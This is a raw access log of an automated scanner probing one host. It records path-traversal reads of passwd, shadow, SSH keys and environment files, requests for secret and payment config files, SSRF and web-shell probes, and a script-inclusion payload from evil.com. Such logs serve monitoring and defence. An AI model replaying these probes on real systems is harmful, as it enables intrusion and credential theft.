nas.profibot.hu "/config/env.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cetc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/split/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/synthesis/faceset.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/riskengine/score_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/settings.py" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/login?forwardToken=" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 403 403 - GET https nas.profibot.hu "/.DS_Store" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/opt/iredmail/iredmail.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/ansible/vault.key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/kyc/business_verification.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/opt/mailcow-dockerized/mailcow.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/paypal/ipn" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/seo-tools/meta.config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/nav/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/dashboard/email/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/graphql/query" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/accounting/api_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/etc/mysql/my.cnf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:47 +0000] - 404 404 - GET https nas.profibot.hu "/amazonpay/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/api/keys" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 403 403 - GET https nas.profibot.hu "/.mnemonic" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/ar/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "///////proc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/////////////windows/system32/config/SAM" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/cmd.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/ghost/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/audit/traceability.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "///////etc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/etc/suricata/suricata.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/localhost.run/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/backup/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/admin/webhook-test?target=127.0.0.1" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/admin.php.old.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/microservices/api_gateway/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/includes/settings.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/vnc.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - 404 404 - GET https nas.profibot.hu "/rabbitmq/rabbitmq.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:48 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/client/stripe.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/streaming/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/usr/lib/pine.conf.fixed" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/api/payments/auto_failover.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/api/graphql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/ping?host=127.0.0.1" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/build.ninja" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/switch-role?to=superadmin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/checkout/paypal.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/checkout/invoice_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/etc/init.d/mailservice" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/typo3conf/ext/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/admin/webhook-test" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/argocd/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 403 403 - GET https nas.profibot.hu "/.env.prod.mail" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/wallet/keystore.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/mailjet.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/api/load?script=//evil.com/payload.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/llm/prompts.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:49 +0000] - 404 404 - GET https nas.profibot.hu "/downloads/products.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/coinpayments/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/usr/local/etc/lighttpd.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/egress.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/admin-dev/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/wsdl.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/admin/mail/status" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/devtools/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/crypto/entropy_pool.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/zzadmin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/e2e/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/pages/home" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/meshcentral/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/debug-ui/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/argo/argo-config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/Default.aspx" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 403 403 - GET https nas.profibot.hu "/.bzr/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/walletconnect/config.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/migration/backup/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/payment_gateway/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:50 +0000] - 404 404 - GET https nas.profibot.hu "/modsec.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/stripe.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/mobile/checkout_sdk.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/Dockerfile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/bonuses/bonus_structure.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/values.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 403 403 - GET https nas.profibot.hu "/~/.offlineimaprc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/roundcube/config/defaults.inc.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/tools/fetch?uri=127.0.0.1" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 403 403 - GET https nas.profibot.hu "/.secret.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/client.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/kubeadm-config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/docker/registry/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/:5984" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 403 403 - GET https nas.profibot.hu "/.ssh/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/squirrelmail/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/documents/3" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/config/dev.exs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/sendgrid.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fvar/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/ios/Runner/GoogleService-Info.plist" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:51 +0000] - 404 404 - GET https nas.profibot.hu "/cmd.php?cmd=whoami" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/consul.d/agent.hcl" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - - 403 - GET https nas.profibot.hu "/request?url=http://localhost" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/attack_vectors/adversarial.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/stripe.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/finance/iso20022_mapping.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/app/config/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/istio/istio-config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/test_fixtures/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/stripe/webhook_secret.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/cryptomus/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/panel/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/iomt/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cwindows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 403 403 - GET https nas.profibot.hu "/.well-known/openid-configuration" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https 